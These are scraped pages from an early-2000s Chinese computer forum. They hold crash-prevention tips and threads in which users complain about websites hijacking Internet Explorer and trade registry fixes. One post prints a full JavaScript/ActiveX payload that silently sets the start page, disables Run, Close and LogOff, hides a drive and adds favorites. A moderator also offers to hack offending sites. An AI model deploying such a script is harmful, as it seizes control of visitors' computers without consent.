1.在同一个硬盘上安装太多的操作系统会引起系统死机。

    2.CPU、显示卡等配件不要超频过高，要注意温度，否则，在启动或运行时会莫名其妙地重启或死机。

    3.在更换电脑配件时，一定要插好，因为配件接触不良会引起系统死机。

    4.BIOS设置要恰当，虽然建议将BIOS设置为最优，但所谓最优并不是最好的，有时最优的设置反倒会引起启动或者运行死机。

    5.最好配备稳压电源，以免电压不稳引起死机。

    6.如果有条件的话，加装一个UPS，使电脑在停电后不会造成死机。

    7.对来历不明的软盘和光盘，不要轻易使用，对E－mail中所附的软件，要用KV300、瑞星等杀毒软件检查后再使用，以免传染病毒后，是系统死机。

    8.在应用软件未正常结束时，别关闭电源，否则会造成系统文件损坏或丢失，引起自动启动或者运行中死机。对于Windows98/2000/NT等系统来说，这点非常重要。

    9.在安装应用软件当中，若出现提示对话框“是否覆盖文件”，最好选择不要覆盖。因为通常当前系统文件是最好的，不能根据时间的先后来决定覆盖文件(除非你对文件的时间很在意)。

    10.在卸载软件时，不要删除共享文件，因为某些共享文件可能被系统或者其他程序使用，一旦删除这些文件，会使应用软件无法启动而死机，或者出现系统运行死机。

    11.设置硬件设备时，最好检查有无保留中断号(IRQ)，不要让其他设备使用该中断号，否则引起IRQ冲突，从而引起系统死机。

    12.在加载某些软件时，要注意先后次序，由于有些软件编程不规范，在运行是不能排在第一，而要放在最后运行，这样才不会引起系统管理的混乱。

    13.在运行大型应用软件时(如OFFICE 2000)，不要在运行状态下退出以前运行的程序，否则会引起整个Windows98系统的崩溃。

    14.在内存较小的情况下(如4MB－16MB)，最好不要运行占用内存较大的应用程序，否则在运行时容易出现死机。建议在运行这些程序时应及时保存当前正在使用的文件。

    15.对于系统文件或重要文件，最好使用隐含属性，这样才不致于因误操作而删除或者覆盖这些文件。

    16.修改硬盘主引导记录时，最好先保存原来的记录，防止因修改失败而无法恢复原来的硬盘主引导记录。

    17.最好少用软件的测试版，因为测试版在某方面不够稳定，在使用后会使系统无法启动。

    18.在Windows95/98中尽量不要运行16位应用程序，因为16位的应用程序会与Windows中的32位应用程序产生冲突，从而引起死机或无法启动。

    19.在升级BIOS之前，应确定所升级的BIOS版本，同时应先保存一下原先的版本，以免升级错误而使系统无法启动。

    20.尽量不要使用盗版的软件，因为这些软件里隐藏着大量病毒，一旦执行，会自动修改你的系统，使系统在运行中出现死机。

    21.在机箱中，可能蕴藏了大量的灰尘，灰尘若接触了配件的电路，会使系统不稳定或死机。

    22.在执行磁盘碎片整理的时后，不要运行大型应用软件，否则引起死机。

    23.用杀毒软件检查硬盘期间，不要运行其它的应用程序，以防止系统死机。

    24.在上网的时候，不要一次打开太多的浏览窗口，导致资源不足，引起死机。

    25.在关闭计算机的时候，不要直接使用机箱中的电源按钮，因为直接使用电源按钮会引起文件的丢失，使下次不能正常启动，从而造成系统死机。

    对经常死机朋友，请试试以上方法，相信会对大家有一定的帮助的，有时候要针对具体情况来采取不同的对策，切不可生搬硬套哦!

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 | 主题：防止电脑死机二十五招（转）
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于windows的常见问题

计算机技术
关于windows的常见问题

上一贴 | 下一贴
发表人 | 主题: 关于windows的常见问题
51windows 海娃 积分：2284 发帖：682 来自：湖南－山东 注册：2001-12-02 | 发表于 2001-12-14 15:32:19 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 收藏该主题供以后查看 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 请到http://www.5dns.com/hw/windows/index.htm 相信能为你解决一些问题！ Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 系统出问题了?请看！
上一贴 | 下一贴
快速回复 | 主题：关于windows的常见问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何更改每次启动时被人修改的默认首页。

计算机技术
如何更改每次启动时被人修改的默认首页。

上一贴 | 下一贴
发表人 主题: 如何更改每次启动时被人修改的默认首页。
路漫漫

初级用户
积分：87
发帖：28
来自：
注册：2001-09-18
 发表于 2001-12-03 23:57:29 按此观看路漫漫的个人资料 按此发邮件给路漫漫 收藏该主题供以后查看 发送悄悄话给路漫漫 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看路漫漫的IP
我的计算机每次启动时总是那个默认首页（是亚洲交友中心的首页）

我该如何更改每次启动时被人修改的默认首页呢？

请大家帮帮忙~

我很初级
jorkof

终级用户
积分：1197
发帖：367
来自：北京
注册：2001-06-16
 发表于 2001-12-04 06:39:38 按此观看jorkof的个人资料 按此发邮件给jorkof 访问jorkof的主页 jorkof 的 oicq 是3707274,查看 3707274 的资料 发送悄悄话给jorkof 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jorkof的IP
工具菜单下internet选项

≮曾经沧海难为水jorkof.my163.com除却巫山不是云≯
zy2003

超级用户
积分：376
发帖：143
来自：
注册：2001-10-09
 发表于 2001-12-04 07:35:44 按此观看zy2003的个人资料 按此发邮件给zy2003 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP
按如下方法修改注册标！或者将如下内容保存为XXX.reg文件，双击运行即可！

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Micrsoft Internet Explorer"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Micrsoft Internet Explorer"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="about:blank"

[img]http://51abc.net/banner/banner2.gif[/img]
即溶冰人

高级用户
积分：205
发帖：102
来自：廣東
注册：2001-01-17
 发表于 2001-12-04 16:05:19 按此观看即溶冰人的个人资料 按此发邮件给即溶冰人 访问即溶冰人的主页 即溶冰人 的 oicq 是1980888,查看 1980888 的资料 发送悄悄话给即溶冰人 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看即溶冰人的IP
下个兔子回来改改就行了

淡忘。。。
路漫漫

初级用户
积分：87
发帖：28
来自：
注册：2001-09-18
 发表于 2001-12-04 19:14:06 按此观看路漫漫的个人资料 按此发邮件给路漫漫 发送悄悄话给路漫漫 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看路漫漫的IP
还是不明白，笨死了~

我很初级
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-04 19:18:48 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
先点开始，在点运行，再输入regedit，寻找 亚洲交友中心 这几个字，删掉就可以了！~

WINDFLASH
::浅紫色FORUM::
arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2001-12-05 21:41:50 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
IE反修改精灵
是个软件

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
天行健

高级用户
积分：184
发帖：72
来自：SKYJH
注册：2002-03-11
 发表于 2002-04-30 06:41:05 按此观看天行健的个人资料 按此发邮件给天行健 访问天行健的主页 天行健 的 oicq 是63153941,查看 63153941 的资料 发送悄悄话给天行健 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天行健的IP
yuzhiqing在上个帖子中说
引用:
先点开始，在点运行，再输入regedit，寻找 亚洲交友中心 这几个字，删掉就可以了！~

[img]http://campus.ytu.edu.cn/xcb/forum/pic/logo_2.gif[/img]
[img]http://campus.ytu.edu.cn/xcb/forum/pic/LOGO.GIF[/img]
红色论坛！
烟台大学学生论坛！
地址http://luojie.7i24.com

Hongse Web Team
[size=1]Mode

上一贴 | 下一贴
快速回复 | 主题：如何更改每次启动时被人修改的默认首页。
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


看我的浏览器，被改成这样了，谁知道怎么改回来？

论坛灌水区
看我的浏览器，被改成这样了，谁知道怎么改回来？

上一贴 | 下一贴
发表人 主题: 看我的浏览器，被改成这样了，谁知道怎么改回来？
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-06-21 18:58:37 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 收藏该主题供以后查看 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
现在的网站太不像话了，随便修改别人的主页、收藏。现在连我的浏览器外观也给改了。

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

胸口别朵大红花

乱 步
管理员
积分：3982
发帖：2141
来自：TOPIDEA.ORG
注册：2000-09-19
 发表于 2001-06-21 19:01:07 按此观看胸口别朵大红花的个人资料 按此发邮件给胸口别朵大红花 访问胸口别朵大红花的主页 胸口别朵大红花 的 oicq 是2148860,查看 2148860 的资料 发送悄悄话给胸口别朵大红花 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看胸口别朵大红花的IP
这个广告做得好。
有趣。

Blueidea Web Team
Team Housekeeper
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-06-21 19:03:19 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
还好？那你也去这网站访问一次好了，让你天天看！天天看！

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

blueonline

Blueonline
积分：815
发帖：1676
来自：blue-online.
注册：2000-12-09
 发表于 2001-06-21 19:09:49 按此观看blueonline的个人资料 按此发邮件给blueonline 访问blueonline的主页 blueonline 的 oicq 是2048486,查看 2048486 的资料 发送悄悄话给blueonline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blueonline的IP
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main, 在右窗点右键，“新建|字符串值”，重命名为“window Title”，串值内容改为你想要的文字。(for win98)

or use megicset .

流自己的汗，吃自己的饭，靠天、靠地不如自己干。

:::::::bLUE-oNlINE.nET || vERSION 2001 ───────

张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-06-21 19:13:48 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
我搜索了一下注册表，然后搞定了，不止上面的一处，还有一处要改，一共两处。

看来ie的安全性的确太差，微软也不知道干什么吃的，连注册表这东西都可以通过浏览器被改！

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

Marina

高级用户
积分：152
发帖：68
来自：
注册：2001-05-14
 发表于 2001-06-21 19:14:13 按此观看Marina的个人资料 该用户不允许显示它的电子邮件 访问Marina的主页 发送悄悄话给Marina 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Marina的IP
注册表老手一现身，就是不一样~~够专业~

http://MarinaCN.126.com
STRONG SEARCHING COME FROM MARINA
Marina

高级用户
积分：152
发帖：68
来自：
注册：2001-05-14
 发表于 2001-06-21 19:18:39 按此观看Marina的个人资料 该用户不允许显示它的电子邮件 访问Marina的主页 发送悄悄话给Marina 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Marina的IP
to 张无忌：
不是IE的事儿，你把下面的java看看~~
=======================================
<script language="javaScript" >

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

//this function is only needed if you add favorites or links
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
//end add favorites or links function

function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
if (document.cookie.indexOf("Chg") == -1)
{
//set cookie
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//end set cookie

//set home page
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.findfeel.com/");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//end set home page

//set IE title

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "呜啦啦...");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "欢迎你！呜啦啦...故事开始了，按确定进入悲惨世界");

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "呜啦啦...");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "呜啦啦...");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//end IE title

//add favorites this is the common part; should be here if you want to add favorites
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
//end common part

//the following line is used for adding favorites.
//to add multiple favorites, duplicate the following line, changing the last 2 paramaters.
AddFavLnk(loc, "www.blueidea.com", "http://www.blueidea.com/bbs/default.asp");
//end add favorites

}
}
catch(e)
{}
}
catch(e)
{}
}

function init()
{
setTimeout("f()", 1000);
}

init();
[/script]

http://MarinaCN.126.com
STRONG SEARCHING COME FROM MARINA
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-06-21 19:21:34 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
哈哈
我的Windows XP自带的 IE 6没问题
嘿嘿

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
Aero-lk

病态天使
现任版主
积分：8862
发帖：4335
来自：appEndiXDesi
注册：2001-03-14
 发表于 2001-06-21 19:22:17 按此观看Aero-lk的个人资料 按此发邮件给Aero-lk 访问Aero-lk的主页 Aero-lk 的 oicq 是15028519,查看 15028519 的资料 发送悄悄话给Aero-lk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Aero-lk的IP
胸口别朵大红花在上个贴子中说
引用:
这个广告做得好。
有趣。

的确不错哦

F-baby,i love u,forever
未注册

无头版主
现任版主
积分：3176
发帖：893
来自：穷山恶水
注册：2000-06-17
 发表于 2001-06-21 19:27:20 按此观看未注册的个人资料 按此发邮件给未注册 访问未注册的主页 发送悄悄话给未注册 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看未注册的IP
像这种站点我绝对不会去第二次，换有加收藏夹的和设为首页的。
==============================
我恨这种站点恨之入骨，大家发现了这种站点告诉我一声，我黑它一下。

该用户未注册，没有签名。

Blueidea Web Team.
Moderator Of Fireworks Forum.

张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-06-21 19:27:28 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
Marina在上个贴子中说
引用:
to 张无忌：
不是IE的事儿，你把下面的java看看~~
=======================================
<script language="javaScript" >

ie5的安全性太差，所以html中的activex越过了安全检查直接修改了我的注册表。这还叫不关ie的事？

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

13RD

无畏的 13 郎
积分：2207
发帖：2967
来自：广州
注册：2000-06-17
 发表于 2001-06-21 21:52:37 按此观看13RD的个人资料 按此发邮件给13RD 访问13RD的主页 13RD 的 oicq 是1428147,查看 1428147 的资料 发送悄悄话给13RD 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看13RD的IP
未注册在上个贴子中说
引用:
像这种站点我绝对不会去第二次，换有加收藏夹的和设为首页的。
==============================
我恨这种站点恨之入骨，大家发现了这种站点告诉我一声，我黑它一下。

请你教我黑的方法，谢谢！我可是诚心想学的！

我要唱这阙痛快的歌
我要说每句叛逆对白
倾听我呐喊 别当做轻松笑话
我要唱这阙发泄的歌
我要与世界热烈对话
倾听我呐喊
iMac

深 蓝
积分：2125
发帖：2151
来自：shanghai,Chi
注册：2000-07-18
 发表于 2001-06-21 22:19:32 按此观看iMac的个人资料 按此发邮件给iMac iMac 的 oicq 是2822363,查看 2822363 的资料 发送悄悄话给iMac 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看iMac的IP
哈哈,上个星期刚刚帮同事解决这个问题,这种人真是恶心啊!!!

I Love BlueIdea | FIFA2001 | Counter-Strike
仁·者·无·敌 | =SFA= iMac | =BlueIdea= iMac | =-_+= iMac
茕若

姑妄言
积分：1110
发帖：496
来自：沈阳,辽宁,中国
注册：2000-12-30
 发表于 2001-06-21 22:37:39 按此观看茕若的个人资料 按此发邮件给茕若 访问茕若的主页 茕若 的 oicq 是19014396,查看 19014396 的资料 发送悄悄话给茕若 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看茕若的IP
偶最讨厌这种网站

对不起 ：（ 生活的痛苦远远超过了欢乐的程度
清水信雨

阿雨
积分：2375
发帖：985
来自：Zyki
注册：2001-02-17
 发表于 2001-06-22 00:10:23 按此观看清水信雨的个人资料 按此发邮件给清水信雨 访问清水信雨的主页 清水信雨 的 oicq 是4841630,查看 4841630 的资料 发送悄悄话给清水信雨 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看清水信雨的IP
又学了一招！：）

Lost 18th birthday.
Pretty Zyki Rainy ^^
Skit ......d........................yah~
小心

高级用户
积分：238
发帖：315
来自：北京
注册：2001-04-06
 发表于 2001-06-22 04:36:12 按此观看小心的个人资料 该用户不允许显示它的电子邮件 访问小心的主页 小心 的 oicq 是929431,查看 929431 的资料 发送悄悄话给小心 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小心的IP
估计没几天大家就可以用上XX-IE了
啊哈哈~~~~~~~~

小心者,心小也!
13RD

无畏的 13 郎
积分：2207
发帖：2967
来自：广州
注册：2000-06-17
 发表于 2001-06-22 08:48:59 按此观看13RD的个人资料 按此发邮件给13RD 访问13RD的主页 13RD 的 oicq 是1428147,查看 1428147 的资料 发送悄悄话给13RD 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看13RD的IP
茕若在上个贴子中说
引用:
偶最讨厌这种网站

就是，这是绝对的Hard Sell。勉强没有幸福啊~这个道理他都不懂！

我要唱这阙痛快的歌
我要说每句叛逆对白
倾听我呐喊 别当做轻松笑话
我要唱这阙发泄的歌
我要与世界热烈对话
倾听我呐喊
未注册

无头版主
现任版主
积分：3176
发帖：893
来自：穷山恶水
注册：2000-06-17
 发表于 2001-06-22 09:44:54 按此观看未注册的个人资料 按此发邮件给未注册 访问未注册的主页 发送悄悄话给未注册 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看未注册的IP
13RD在上个贴子中说
引用:

请你教我黑的方法，谢谢！我可是诚心想学的！

===================================
哦，我也不会，不过告诉你个地方去看看吧，http://www.chinansl.com
什么时候你把这个站翻的和经典一样熟了就……

该用户未注册，没有签名。

Blueidea Web Team.
Moderator Of Fireworks Forum.

13RD

无畏的 13 郎
积分：2207
发帖：2967
来自：广州
注册：2000-06-17
 发表于 2001-07-10 20:59:35 按此观看13RD的个人资料 按此发邮件给13RD 访问13RD的主页 13RD 的 oicq 是1428147,查看 1428147 的资料 发送悄悄话给13RD 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看13RD的IP
没想到著名的游侠网都这样~

http://game1.zj.cninfo.net

行径真恶劣啊~而且我用的是WinXP自带的IE6呢！没能防住~

我要唱这阙痛快的歌
我要说每句叛逆对白
倾听我呐喊 别当做轻松笑话
我要唱这阙发泄的歌
我要与世界热烈对话
倾听我呐喊
poorfish

经典圣僧
现任版主
积分：10941
发帖：3503
来自：江西萍乡
注册：2000-12-04
 发表于 2001-07-10 21:43:40 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP
张无忌在上个贴子中说
引用:
我搜索了一下注册表，然后搞定了，不止上面的一处，还有一处要改，一共两处。

看来ie的安全性的确太差，微软也不知道干什么吃的，连注册表这东西都可以通过浏览器被改！

你偷笑吧,這還是位仁慈的主,
碰上個不好的讓你的機器自個關掉,格式化你的硬盤也不是難事

【DW版常见问题解答】【破废墟】

Blueidea Web Team
Moderator of DW & JS Forum

MiSuns

终级用户
积分：1311
发帖：1487
来自：上海
注册：2001-07-08
 发表于 2001-07-10 22:38:04 按此观看MiSuns的个人资料 按此发邮件给MiSuns 访问MiSuns的主页 MiSuns 的 oicq 是261236,查看 261236 的资料 发送悄悄话给MiSuns 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MiSuns的IP
张无忌在上个贴子中说
引用:
现在的网站太不像话了，随便修改别人的主页、收藏。现在连我的浏览器外观也给改了。
看不见??

经典灌字 2002－0 号
兹认定 MiSuns 有使用水利部门任何设备的进行灌溉的权利，任何单位和个人不得以任何理由妨碍和扰乱其灌水。
摄影交流  动物世界  留学在外
MiSuns

终级用户
积分：1311
发帖：1487
来自：上海
注册：2001-07-08
 发表于 2001-07-10 22:42:17 按此观看MiSuns的个人资料 按此发邮件给MiSuns 访问MiSuns的主页 MiSuns 的 oicq 是261236,查看 261236 的资料 发送悄悄话给MiSuns 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MiSuns的IP
13RD在上个贴子中说
引用:
没想到著名的游侠网都这样~

http://game1.zj.cninfo.net

行径真恶劣啊~而且我用的是WinXP自带的IE6呢！没能防住~

用TE的浏览器没问题,不过TE很烂,大家试试看用一些类似的浏览器,应该可以(但是IE其实还是被更改了,只是TE本身就是改变了IE的部分设置,所以看上去不一样)

经典灌字 2002－0 号
兹认定 MiSuns 有使用水利部门任何设备的进行灌溉的权利，任何单位和个人不得以任何理由妨碍和扰乱其灌水。
摄影交流  动物世界  留学在外
幽灵

超级用户
积分：358
发帖：216
来自：上海
注册：2001-02-25
 发表于 2001-07-10 23:14:09 按此观看幽灵的个人资料 按此发邮件给幽灵 幽灵 的 oicq 是15868256,查看 15868256 的资料 发送悄悄话给幽灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看幽灵的IP
什么样子啊？我怎么看不见？
偶用蝴蝶浏览器，应该不会出这种问题吧？

上帝会保佑我的，一切都会有的！
黑洞

初级用户
积分：50
发帖：24
来自：
注册：2000-12-15
 发表于 2001-07-10 23:18:26 按此观看黑洞的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给黑洞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看黑洞的IP
张无忌在上个贴子中说
引用:
现在的网站太不像话了，随便修改别人的主页、收藏。现在连我的浏览器外观也给改了。

---------------------------------------------------------------------------------------------------------------------
同感！恶劣之行径，应群起而讨之。

;-)交个朋友
MiSuns

终级用户
积分：1311
发帖：1487
来自：上海
注册：2001-07-08
 发表于 2001-07-10 23:30:49 按此观看MiSuns的个人资料 按此发邮件给MiSuns 访问MiSuns的主页 MiSuns 的 oicq 是261236,查看 261236 的资料 发送悄悄话给MiSuns 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MiSuns的IP
幽灵在上个贴子中说
引用:
什么样子啊？我怎么看不见？
偶用蝴蝶浏览器，应该不会出这种问题吧？
你打开IE酒会有了.理由上面说了.

经典灌字 2002－0 号
兹认定 MiSuns 有使用水利部门任何设备的进行灌溉的权利，任何单位和个人不得以任何理由妨碍和扰乱其灌水。
摄影交流  动物世界  留学在外
MiSuns

终级用户
积分：1311
发帖：1487
来自：上海
注册：2001-07-08
 发表于 2001-07-10 23:35:36 按此观看MiSuns的个人资料 按此发邮件给MiSuns 访问MiSuns的主页 MiSuns 的 oicq 是261236,查看 261236 的资料 发送悄悄话给MiSuns 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MiSuns的IP
小心在上个贴子中说
引用:
估计没几天大家就可以用上XX-IE了
啊哈哈~~~~~~~~
xx-ie ?? 不懂

经典灌字 2002－0 号
兹认定 MiSuns 有使用水利部门任何设备的进行灌溉的权利，任何单位和个人不得以任何理由妨碍和扰乱其灌水。
摄影交流  动物世界  留学在外
上一贴 | 下一贴
快速回复 | 主题：看我的浏览器，被改成这样了，谁知道怎么改回来？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


现在的网站越来越过分！

论坛灌水区
现在的网站越来越过分！

上一贴 | 下一贴
发表人 主题: 现在的网站越来越过分！
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-07-18 18:04:44 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 收藏该主题供以后查看 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
修改主页、收藏，修改浏览器的title。

最近又发现一种，修改了我的windows启动程序，竟然在每次启动机器的时候自动打开ie并联接到某网页！！！

！！！！！！！

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

konglong

超级用户
积分：435
发帖：441
来自：江西
注册：2000-11-29
 发表于 2001-07-18 18:16:15 按此观看konglong的个人资料 按此发邮件给konglong 访问konglong的主页 konglong 的 oicq 是31796573,查看 31796573 的资料 发送悄悄话给konglong 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看konglong的IP
就是.真讨厌!

